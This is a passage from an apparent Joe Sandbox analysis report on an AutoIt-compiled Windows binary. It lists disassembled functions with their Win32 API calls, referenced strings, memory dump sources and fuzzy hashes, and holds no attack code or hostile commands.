Instruction Fuzzy Hash: F1619F71204242AFD321DF54C895F2ABBE5AF94318F14C49CE46A8B7A3C771EC46CB92

Function 00A84322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A843C1
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00A843D6
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A843F0
_wcslen.LIBCMT ref: 00A84435
SendMessageW.USER32(?,00001057,00000000,?), ref: 00A84462
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A84490

Strings

SysListView32, xrefs: 00A84393

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: ef6c6843b39d9665105ec35a0d3bda1906f327b3fd3e8faff47178f0668b1f27
Instruction ID: b48d685d2ca556046cde8a5dcd177ba953ca2ef8e1b2ce83e157d494a0b2cf97
Opcode Fuzzy Hash: ef6c6843b39d9665105ec35a0d3bda1906f327b3fd3e8faff47178f0668b1f27
Instruction Fuzzy Hash: 9241B171900309ABEB21EFA4CC49BEA7BA9FF4C350F100526F954EB291D7749990CB90

Function 00A5C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A5C6C4
IsMenu.USER32(00000000), ref: 00A5C6E4
CreatePopupMenu.USER32 ref: 00A5C71A
GetMenuItemCount.USER32(00C65940), ref: 00A5C76B
InsertMenuItemW.USER32(00C65940,?,00000001,00000030), ref: 00A5C793

Strings

2, xrefs: 00A5C6FE
0, xrefs: 00A5C66F

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 4e6b5ff892e556cdc60b881f04b3a65135527c64fcf147816d93f05a48057bc2
Instruction ID: afcc2e4d6fdbd327aad1386669a039817e627bbdd9a965467e6289ef012bc0a1
Opcode Fuzzy Hash: 4e6b5ff892e556cdc60b881f04b3a65135527c64fcf147816d93f05a48057bc2
Instruction Fuzzy Hash: 8551BF70600305AFDF10CFA8D984BAEBBF4BF58329F24415AEC11A7699E3709949CF61

Function 00A5D11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00A5D1BE

Strings

blank, xrefs: 00A5D140
stop, xrefs: 00A5D18F
question, xrefs: 00A5D177
info, xrefs: 00A5D15F
warning, xrefs: 00A5D1A7

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: f23b2f8f6f9e21f72b7326f2210a2fbb9ccfc8cce44bd9d867ed03638c3842c9
Instruction ID: aee5b5aadd06aee1bda0d529737c6cf7cd0369d8f7faea22c9ec63c517418aff
Opcode Fuzzy Hash: f23b2f8f6f9e21f72b7326f2210a2fbb9ccfc8cce44bd9d867ed03638c3842c9
Instruction Fuzzy Hash: A3110A3124C706BAEB155B54EC83DEE7BACFF09761B20012AFD04A62C2EBB45A844260

Function 00A5E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00A5E759
gethostname.WSOCK32(?,00000100), ref: 00A5E773
gethostbyname.WSOCK32(?), ref: 00A5E780
inet_ntoa.WSOCK32(?), ref: 00A5E7C2
_strcat.LIBCMT ref: 00A5E7D0
WSACleanup.WSOCK32 ref: 00A5E7F5

Strings

0.0.0.0, xrefs: 00A5E79E

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 7b67dd2cec5f6374a9248c18ce98254e9515b07dcf5dd090d328fbe747a694db
Instruction ID: 21cedfb87ddd3576ccdce226899e56f9554efe5c829ba7ec54c4ac2387a29f15
Opcode Fuzzy Hash: 7b67dd2cec5f6374a9248c18ce98254e9515b07dcf5dd090d328fbe747a694db
Instruction Fuzzy Hash: 9A11D2719001147FDB24E7649D4AEEA77BCEF05715F0000A9F955A6091EEB48B868750

Function 00A5F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00A5F641
_wcslen.LIBCMT ref: 00A5F652
_wcslen.LIBCMT ref: 00A5F690
_wcslen.LIBCMT ref: 00A5F6C6
_wcslen.LIBCMT ref: 00A5F6F6
_wcslen.LIBCMT ref: 00A5F706
_wcslen.LIBCMT ref: 00A5F742
_wcslen.LIBCMT ref: 00A5F771

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 4f81954da24c85ff90a5c5e35b9785b5f987fdb90bb10431e0fbe9b40ed05093
Instruction ID: aee361fe928b3a0708cb3144067f1957d83c0fcf9f5dfd355d0c900ba2970683
Opcode Fuzzy Hash: 4f81954da24c85ff90a5c5e35b9785b5f987fdb90bb10431e0fbe9b40ed05093
Instruction Fuzzy Hash: D941A665D11514B9CB11EBF8CD86ACFB7ACAF09311F508862E518E3121FB34D2A5C7E6

Function 00A0FBC6 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00A339E2,00000004,00000000,00000000), ref: 00A0FC41
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00A339E2,00000004,00000000,00000000), ref: 00A4FC15
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00A339E2,00000004,00000000,00000000), ref: 00A4FC98

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 015f4eec6c3d599a0d3c216f4f47eeee89d62d7ef0774211e53fec0b4062f545
Instruction ID: a445ef58dfe5be964d547b392edeb29b63a43cb7f1d6d7a9000875a996c57b27
Opcode Fuzzy Hash: 015f4eec6c3d599a0d3c216f4f47eeee89d62d7ef0774211e53fec0b4062f545
Instruction Fuzzy Hash: A741193560838C9EE739CB38E9CDB3A7BB1AB86711F14553CE94766EE0C631A881C711

Function 00A8379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00A837B7
GetDC.USER32(00000000), ref: 00A837BF
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A837CA
ReleaseDC.USER32(00000000,00000000), ref: 00A837D6
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00A83812
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A83823
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00A86504,?,?,000000FF,00000000,?,000000FF,?), ref: 00A8385E
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A8387D

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 685819bdfd1e6ef4dbbbf2fffb76639810d1b601d2ddc5336917fd613c926e5c
Instruction ID: deb74dd6841ec13b26f9ac7758392cf35fc43a06bf10ea91f82abfca596f60b9
Opcode Fuzzy Hash: 685819bdfd1e6ef4dbbbf2fffb76639810d1b601d2ddc5336917fd613c926e5c
Instruction Fuzzy Hash: E3318B72201214BFEF159F90DC89FEB3FA9EF49B21F044065FE099A291D6B59C52C7A0

Function 00A75A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00A75A8B, 00A75DE0
Not an Object type, xrefs: 00A75A64

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: bedb49187784b27a1080047e6445e0ba6f4fdc0b5326aa68fb3f9f3a5b946703
Instruction ID: 4cc7a67aaac02671b52a962a4818c82f23d61ff4ec276fb076ba81bf7d594039
Opcode Fuzzy Hash: bedb49187784b27a1080047e6445e0ba6f4fdc0b5326aa68fb3f9f3a5b946703
Instruction Fuzzy Hash: 66D19F71E0060AAFDB10CF68CC85AAEB7B5FF48344F14C569E919AB281E7B0DD45CB50

Function 00A318A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00A31B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00A3194E
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00A31B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00A319D1
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00A31B7B,?,00A31B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00A31A64
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00A31B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00A31A7B

Part of subcall function 00A23B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A16A79,?,0000015D,?,?,?,?,00A185B0,000000FF,00000000,?,?), ref: 00A23BC5

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00A31B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00A31AF7
__freea.LIBCMT ref: 00A31B22
__freea.LIBCMT ref: 00A31B2E

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 9d27ab972e142186c1ca9e7739f61e971f3c559bad550ae4f2da71a4140e8142
Instruction ID: bfce8ceff2f3f3455486d3e52e23d8d34a55546adce370c8ef6091975032072c
Opcode Fuzzy Hash: 9d27ab972e142186c1ca9e7739f61e971f3c559bad550ae4f2da71a4140e8142
Instruction Fuzzy Hash: 67919272E002169ADB208FA4DD91FEEBBB5EF09350F180669F815E7280EB35DD41C7A0

Function 00A74F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A750A5
VariantInit.OLEAUT32(?), ref: 00A751A6
VariantClear.OLEAUT32(?), ref: 00A751B0
VariantClear.OLEAUT32(?), ref: 00A7520D

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00A75189
Null Object assignment in FOR..IN loop, xrefs: 00A75035, 00A75163, 00A7521B

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 0f6aa8da459820e464f78038eacae47ad7b2dc088da8af20e34693a8836fa383
Instruction ID: 1b1abf0a6f2b39db3411b510e188561a72cc79162f7f84768651759508e1c2bf
Opcode Fuzzy Hash: 0f6aa8da459820e464f78038eacae47ad7b2dc088da8af20e34693a8836fa383
Instruction Fuzzy Hash: 24918B71E00619AFDF20DFA5CC48FAEBBB8EF45715F10C559E509AB281D7B09941CBA0

Function 00A61B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00A61C1B
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A61C43
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00A61C67
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A61C97
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A61D1E
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A61D83
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A61DEF

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 64305721ce29e2c8cc2f20ae38de2b43aec011ff4b5c1f816d0da9015e26add7
Instruction ID: d245858d20033e10d08eacd9270c9d72ff5eb569234bbfa5b2f34c3d6ff4ee31
Opcode Fuzzy Hash: 64305721ce29e2c8cc2f20ae38de2b43aec011ff4b5c1f816d0da9015e26add7
Instruction Fuzzy Hash: 1E91CE75A00219AFDB01DFA8C885BBEBBB4FF44715F184429E950EB2A1E774A941CB90

Function 00A743A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A743C8
CharUpperBuffW.USER32(?,?), ref: 00A744D7
_wcslen.LIBCMT ref: 00A744E7
VariantClear.OLEAUT32(?), ref: 00A7467C

Part of subcall function 00A6169E: VariantInit.OLEAUT32(00000000), ref: 00A616DE
Part of subcall function 00A6169E: VariantCopy.OLEAUT32(?,?), ref: 00A616E7
Part of subcall function 00A6169E: VariantClear.OLEAUT32(?), ref: 00A616F3

Strings

Incorrect Parameter format, xrefs: 00A74403, 00A745FE
AUTOIT.ERROR, xrefs: 00A744DD, 00A744E2

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: abb97128338b6a5184beb88b60a06a842acf03227d3803e587960c6b58fd68f5
Instruction ID: 58d005e1c5a7d408b66d7ce83cfc80f554f6d083f321f3fa627ae8889951ea0a
Opcode Fuzzy Hash: abb97128338b6a5184beb88b60a06a842acf03227d3803e587960c6b58fd68f5
Instruction Fuzzy Hash: 8D914775A083059FC700EF28C98096ABBE5FF89714F14892DF9899B351DB31ED46CB82

Function 00A7560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00A508FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A50831,80070057,?,?,?,00A50C4E), ref: 00A5091B
Part of subcall function 00A508FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A50831,80070057,?,?), ref: 00A50936
Part of subcall function 00A508FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A50831,80070057,?,?), ref: 00A50944
Part of subcall function 00A508FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A50831,80070057,?), ref: 00A50954

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00A756AE
_wcslen.LIBCMT ref: 00A757B6
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00A7582C
CoTaskMemFree.OLE32(?), ref: 00A75837

Strings

NULL Pointer assignment, xrefs: 00A75880, 00A758AF

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 3e0e8f863cd82590e315bd8bc9924d1b881cbe929c2f1193aeeb89b74f620cc0
Instruction ID: ad57fac101af5c9448da91c2dac540fc6fcb094806d10e89f46193bbd37704ea
Opcode Fuzzy Hash: 3e0e8f863cd82590e315bd8bc9924d1b881cbe929c2f1193aeeb89b74f620cc0
Instruction Fuzzy Hash: 5E910471D0021DAFDF14DFA4CC80AEEB7B9BF48310F108569E919A7291EB709A45CFA1

Function 00A82B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00A82C1F
GetMenuItemCount.USER32(00000000), ref: 00A82C51
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A82C79
_wcslen.LIBCMT ref: 00A82CAF
GetMenuItemID.USER32(?,?), ref: 00A82CE9
GetSubMenu.USER32(?,?), ref: 00A82CF7

Part of subcall function 00A54393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A543AD
Part of subcall function 00A54393: GetCurrentThreadId.KERNEL32 ref: 00A543B4
Part of subcall function 00A54393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A52F00), ref: 00A543BB

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A82D7F

Part of subcall function 00A5F292: Sleep.KERNEL32 ref: 00A5F30A

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 7c81c7380b6dbde1ac26cfb8181916b9ff08eb89bac4abdc449614cb538316d4
Instruction ID: c4be95ec4ab46d8c0d25895ec777788fa41d88fba060976f3e5f5d727d5acfe6
Opcode Fuzzy Hash: 7c81c7380b6dbde1ac26cfb8181916b9ff08eb89bac4abdc449614cb538316d4
Instruction Fuzzy Hash: 33716C75A00209AFCB14EFA4C945BBEBBF5EF48320F148469E916EB351DB74AD41CB90

Function 00A888F9 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00A88992
IsWindowEnabled.USER32(00000000), ref: 00A8899E
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00A88A79
SendMessageW.USER32(00000000,000000B0,?,?), ref: 00A88AAC
IsDlgButtonChecked.USER32(?,00000000), ref: 00A88AE4
GetWindowLongW.USER32(00000000,000000EC), ref: 00A88B06
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00A88B1E

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: df91d6b1f30c66b1b2f2a8f8482722201757348cafa4dc4ef0d1ec92b6ccdcf3
Instruction ID: 3aba376e83a233ce155085bf2611a3ac89d5d92961b2734bcff9539e40598b4a
Opcode Fuzzy Hash: df91d6b1f30c66b1b2f2a8f8482722201757348cafa4dc4ef0d1ec92b6ccdcf3
Instruction Fuzzy Hash: FE71CF74600208AFEF25EF94C884FBABBB5FF49340F94045AE855A72A1CF39AD41DB50

Function 00A5B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00A5B8C0
GetKeyboardState.USER32(?), ref: 00A5B8D5
SetKeyboardState.USER32(?), ref: 00A5B936
PostMessageW.USER32(?,00000101,00000010,?), ref: 00A5B964
PostMessageW.USER32(?,00000101,00000011,?), ref: 00A5B983
